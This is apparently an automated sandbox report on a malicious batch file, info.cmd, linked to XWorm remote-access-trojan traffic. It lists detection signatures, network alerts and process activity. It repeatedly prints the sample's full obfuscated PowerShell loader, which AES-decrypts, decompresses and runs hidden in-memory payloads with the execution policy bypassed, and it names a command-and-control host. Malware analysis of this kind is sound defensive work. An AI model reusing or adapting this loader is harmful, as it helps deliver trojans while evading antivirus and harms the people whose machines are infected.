Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
info.cmd

Overview

General Information

Sample name:info.cmd
Analysis ID:1446781
MD5:43f3ee9c714203eeccd5503d17a36105
SHA1:d554becc96c1296d948382fd2ea8c1a1ad0184c8
SHA256:c153c05ebbf7db866984c1b21da5bfebbaedcfa5fce0cecb09a50377e0503a53
Tags:cmd
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic
Yara detected Powershell decode and execute
Bypasses PowerShell execution policy
Obfuscated command line found
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Gzip Archive Decode Via PowerShell
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 5448 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\info.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4940 cmdline: cmd /c "set __=^&rem" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 5656 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pPLpJHM4GQSp820ezozLInZkcLGjwzAfhFyAUo/d1yU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kFkMa+H0Xjazq+yg0jtHMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $liFcl=New-Object System.IO.MemoryStream(,$param_var); $YKPPP=New-Object System.IO.MemoryStream; $DrFOQ=New-Object System.IO.Compression.GZipStream($liFcl, [IO.Compression.CompressionMode]::Decompress); $DrFOQ.CopyTo($YKPPP); $DrFOQ.Dispose(); $liFcl.Dispose(); $YKPPP.Dispose(); $YKPPP.ToArray();}function execute_function($param_var,$param2_var){ $aGqbX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rErds=$aGqbX.EntryPoint; $rErds.Invoke($null, $param2_var);}$UsDBW = 'C:\Users\user\Desktop\info.cmd';$host.UI.RawUI.WindowTitle = $UsDBW;$rybfn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UsDBW).Split([Environment]::NewLine);foreach ($bSMhM in $rybfn) { if ($bSMhM.StartsWith('WUgLizIwoCqVFjuaxzXG')) { $FYrof=$bSMhM.Substring(20); break; }}$payloads_var=[string[]]$FYrof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 5536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass MD5: 04029E121A0CFA5991749937DD22A1D9)
      • wermgr.exe (PID: 3360 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5536" "1456" "1404" "1220" "0" "0" "1504" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
\Device\ConDrvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_5536.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspicious PowerShell Parameter Substring
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\info.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5448, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, ProcessId: 5536, ProcessName: powershell.exe
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\info.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5448, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, ProcessId: 5536, ProcessName: powershell.exe
      Sigma detected: Gzip Archive Decode Via PowerShell
      Source: Process startedAuthor: Hieu Tran: Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pPLpJHM4GQSp820ezozLInZkcLGjwzAfhFyAUo/d1yU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kFkMa+H0Xjazq+yg0jtHMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $liFcl=New-Object System.IO.MemoryStream(,$param_var); $YKPPP=New-Object System.IO.MemoryStream; $DrFOQ=New-Object System.IO.Compression.GZipStream($liFcl, [IO.Compression.CompressionMode]::Decompress); $DrFOQ.CopyTo($YKPPP); $DrFOQ.Dispose(); $liFcl.Dispose(); $YKPPP.Dispose(); $YKPPP.ToArray();}function execute_function($param_var,$param2_var){ $aGqbX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rErds=$aGqbX.EntryPoint; $rErds.Invoke($null, $param2_var);}$UsDBW = 'C:\Users\user\Desktop\info.cmd';$host.UI.RawUI.WindowTitle = $UsDBW;$rybfn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UsDBW).Split([Environment]::NewLine);foreach ($bSMhM in $rybfn) { if ($bSMhM.StartsWith('WUgLizIwoCqVFjuaxzXG')) { $FYrof=$bSMhM.Substring(20); break; }}$payloads_var=[string[]]$FYrof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pPLpJHM4GQSp820ezozLInZkcLGjwzAfhFyAUo/d1yU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kFkMa+H0Xjazq+yg0jtHMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $liFcl=New-Object System.IO.MemoryStream(,$param_var); $YKPPP=New-Object System.IO.MemoryStream; $DrFOQ=New-Object System.IO.Compression.GZipStream($liFcl, [IO.Compression.CompressionMode]::Decompress); $DrFOQ.CopyTo($YKPPP); $DrFOQ.Dispose(); $liFcl.Dispose(); $YKPPP.Dispose(); $YKPPP.ToArray();}function execute
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\info.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5448, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, ProcessId: 5536, ProcessName: powershell.exe

      Snort Signatures

      Timestamp:05/23/24-21:10:10.754109
      SID:2852874
      Source Port:2905
      Destination Port:49705
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:05/23/24-21:10:10.754109
      SID:2852870
      Source Port:2905
      Destination Port:49705
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:05/23/24-21:07:45.319600
      SID:2855924
      Source Port:49705
      Destination Port:2905
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:05/23/24-21:08:53.440750
      SID:2853193
      Source Port:49705
      Destination Port:2905
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      Networking

      barindex
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 163.172.59.233:2905 -> 192.168.2.8:49705
      Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 163.172.59.233:2905 -> 192.168.2.8:49705
      Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.8:49705 -> 163.172.59.233:2905
      Source: TrafficSnort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.8:49705 -> 163.172.59.233:2905
      Uses dynamic DNS services
      Source: unknownDNS query: name: newremisco2905.duckdns.org
      Source: global trafficTCP traffic: 192.168.2.8:49705 -> 163.172.59.233:2905
      Source: Joe Sandbox ViewIP Address: 163.172.59.233 163.172.59.233
      Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: newremisco2905.duckdns.org
      Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
      Source: classification engineClassification label: mal76.troj.evad.winCMD@9/9@1/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2464:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\0h9jcqiqjT5SnJcR
      Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3360:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ve00zt2.aut.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\info.cmd" "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "set __=^&rem"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pPLpJHM4GQSp820ezozLInZkcLGjwzAfhFyAUo/d1yU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kFkMa+H0Xjazq+yg0jtHMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $liFcl=New-Object System.IO.MemoryStream(,$param_var); $YKPPP=New-Object System.IO.MemoryStream; $DrFOQ=New-Object System.IO.Compression.GZipStream($liFcl, [IO.Compression.CompressionMode]::Decompress); $DrFOQ.CopyTo($YKPPP); $DrFOQ.Dispose(); $liFcl.Dispose(); $YKPPP.Dispose(); $YKPPP.ToArray();}function execute_function($param_var,$param2_var){ $aGqbX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rErds=$aGqbX.EntryPoint; $rErds.Invoke($null, $param2_var);}$UsDBW = 'C:\Users\user\Desktop\info.cmd';$host.UI.RawUI.WindowTitle = $UsDBW;$rybfn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UsDBW).Split([Environment]::NewLine);foreach ($bSMhM in $rybfn) { if ($bSMhM.StartsWith('WUgLizIwoCqVFjuaxzXG')) { $FYrof=$bSMhM.Substring(20); break; }}$payloads_var=[string[]]$FYrof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5536" "1456" "1404" "1220" "0" "0" "1504" "0" "0" "0" "0" "0"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "set __=^&rem"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pPLpJHM4GQSp820ezozLInZkcLGjwzAfhFyAUo/d1yU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kFkMa+H0Xjazq+yg0jtHMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $liFcl=New-Object System.IO.MemoryStream(,$param_var); $YKPPP=New-Object System.IO.MemoryStream; $DrFOQ=New-Object System.IO.Compression.GZipStream($liFcl, [IO.Compression.CompressionMode]::Decompress); $DrFOQ.CopyTo($YKPPP); $DrFOQ.Dispose(); $liFcl.Dispose(); $YKPPP.Dispose(); $YKPPP.ToArray();}function execute_function($param_var,$param2_var){ $aGqbX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rErds=$aGqbX.EntryPoint; $rErds.Invoke($null, $param2_var);}$UsDBW = 'C:\Users\user\Desktop\info.cmd';$host.UI.RawUI.WindowTitle = $UsDBW;$rybfn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UsDBW).Split([Environment]::NewLine);foreach ($bSMhM in $rybfn) { if ($bSMhM.StartsWith('WUgLizIwoCqVFjuaxzXG')) { $FYrof=$bSMhM.Substring(20); break; }}$payloads_var=[string[]]$FYrof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypassJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: avicap32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvfw32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

      Data Obfuscation

      barindex
      Obfuscated command line found
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "set __=^&rem"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "set __=^&rem"Jump to behavior
      Suspicious powershell command line found
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypassJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
